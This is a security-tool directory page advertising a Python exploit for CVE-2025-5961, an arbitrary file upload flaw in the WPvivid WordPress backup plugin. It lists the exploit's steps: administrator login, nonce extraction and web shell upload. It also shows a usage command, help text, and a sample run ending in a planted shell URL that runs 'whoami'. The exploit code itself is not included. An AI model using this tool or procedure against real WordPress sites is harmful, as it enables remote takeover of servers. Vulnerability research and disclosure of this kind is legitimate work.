Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/nxploited/cve-2025-5961
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload

📈 This vulnerability affects a plugin with over 700,000+ installs


📝 CVE Details

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (High)
  • Published: July 3, 2025

🔍 Description

The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wpvivid_upload_import_files function in all versions up to, and including, 0.9.116.

This allows authenticated attackers (Administrator-level and above) to upload arbitrary files to the server, potentially enabling remote code execution.


🧰 Script

This repository contains an exploit script for CVE-2025-5961, written in Python, which:

  • Checks plugin version.
  • Logs in as Administrator.
  • Extracts the required nonce from the plugin page.
  • Uploads a web shell payload.
  • Prints the URL to access the shell.

🖥️ Example Usage

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Usage

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Output Example

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Disclaimer

This script is provided for educational and research purposes only.
The author is not responsible for any misuse or damage caused by this tool.


✍️ By

Khaled Alenazi (Nxploited)
🌐 GitHub


Download Tool